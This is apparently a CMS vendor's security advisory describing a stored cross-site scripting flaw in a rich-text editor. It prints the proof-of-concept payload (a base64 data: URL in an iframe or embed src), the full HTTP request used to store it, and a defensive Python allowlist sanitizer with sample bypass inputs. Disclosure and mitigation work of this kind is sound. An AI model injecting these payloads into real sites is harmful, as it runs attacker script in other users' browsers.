The text editor contains a Stored Cross-Site Scripting vulnerability 

Issue date: 27-10-2020
Affects versions: 14.2

Security Issue ID

SECURITY-169


Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2


Severity 

high


Description

To exploit this vulnerability, a payload was crafted consisting of a base64-encoded string with the following value:
<svg/onload=alert(1)>

This payload was placed inside a data: URL with the content type "text/html", and that URL was set as the "src" attribute of an iframe element; when the stored content is rendered, the browser decodes the data: URL and executes the onload handler. Note that the "embed" element is also vulnerable.
The request below shows the payload in the last form-data part:


POST /cms/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.workflow-menu-list-1-item-link&iframe&wicket-ajax=true&wicket-ajax-baseurl=%3F1%26amp%3Biframe HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326343405939007604132881994108
Content-Length: 1185
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/cms/?1&iframe&path=/content/documents/developertrial/banners/banner1
Cookie: --snip--
Upgrade-Insecure-Requests: 1

-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="id2f_hf_0"

-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:1:item:view:1:fieldContainer:item:value:widget"

Stored XSS
-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:2:item:view:2:fieldContainer:item:panel:editor"

<p><iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe></p>
--snip--

The response below shows that the server accepted the submission with a 200 status code:

HTTP/1.1 200
Date: Mon, 08 Jun 2020 00:23:33 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Connection: close
Content-Length: 18885
--snip--

By default, authors are not able to publish pages to the site, but with this payload they can place client-side scripts that execute for other users of the CMS. Users with publishing privileges can place client-side scripts in the frontend, which affects all visitors of the site.
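The advisory states the root cause only implicitly: the rich-text field stores markup in which iframe and embed elements keep an attacker-controlled "src", and a data: URL with text/html content is enough to execute script. The following Python sanitizer is an added example, not code from the vendor or the CMS, and the allowlist it applies is an assumption chosen for illustration. It decodes the advisory's payload and then rebuilds an untrusted rich-text fragment from parsed tokens, keeping only allowlisted tags and attributes and only http(s) or site-relative URLs, so the iframe and embed variants are dropped together with javascript: links and on* event-handler attributes.

```python
import base64
import html
from html.parser import HTMLParser

# The payload from the advisory: base64 of "<svg/onload=alert(1)>".
PAYLOAD_B64 = "PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"

# Hypothetical allowlist for a rich-text field. These sets are assumptions
# made for this example, not the CMS's own policy.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
# Elements whose contents are discarded along with the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object"}


def decode_payload(b64):
    """Decode the base64 body of the data: URL used in the advisory."""
    return base64.b64decode(b64).decode("utf-8")


def url_is_safe(value):
    """Accept only http(s) and site-relative URLs.

    Rejects data:, javascript: and vbscript: outright and also blocks
    protocol-relative "//host" links. Whitespace and control characters are
    removed before the check because browsers ignore them when parsing a
    scheme (e.g. "java\\nscript:")."""
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace()).lower()
    if cleaned.startswith("//"):
        return False
    return cleaned.startswith(("http://", "https://", "/"))


class RichTextSanitizer(HTMLParser):
    """Allowlist sanitizer: the fragment is parsed and re-serialised from the
    parsed tokens, so anything not explicitly permitted is dropped instead of
    being pattern-matched in the raw string."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.findings = []
        self._skip_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.findings.append("dropped <%s> with its content" % tag)
            self._skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append("dropped <%s>" % tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers are never allowed; everything else must be allowlisted per tag.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append("dropped attribute %s on <%s>" % (name, tag))
                continue
            if name in URL_ATTRS and not url_is_safe(value):
                self.findings.append("dropped unsafe %s=%r on <%s>" % (name, value, tag))
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments never reach the stored value


def sanitize(fragment):
    """Return (clean_html, findings) for an untrusted rich-text fragment."""
    parser = RichTextSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.findings


if __name__ == "__main__":
    # Constructed inputs: the advisory's iframe payload, the embed variant, and
    # two classic bypasses that a tag-only denylist would miss.
    samples = [
        '<p><iframe src="data:text/html;base64,%s"></iframe></p>' % PAYLOAD_B64,
        '<p><embed src="data:text/html;base64,%s">text</p>' % PAYLOAD_B64,
        '<a href="javascript:alert(1)">link</a>',
        '<img src="x" onerror="alert(1)">',
    ]
    print("decoded payload:", decode_payload(PAYLOAD_B64))
    for s in samples:
        clean, findings = sanitize(s)
        print(repr(clean), findings)
```

Running the module directly prints the decoded payload and the sanitized form of a few constructed variants. The design point is that removing only iframe and embed would not be sufficient: any attribute that accepts a URL or an event handler must be constrained as well, which is why the example also rejects javascript: hrefs and on* attributes rather than enumerating bad tags.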

Instructions

Customers are advised to upgrade to the latest maintenance or minor release as indicated above. This can be done by incrementing the version number of the parent POM of the implementation project.

Credit for discovering this issue

Thomas van Ruitenbeek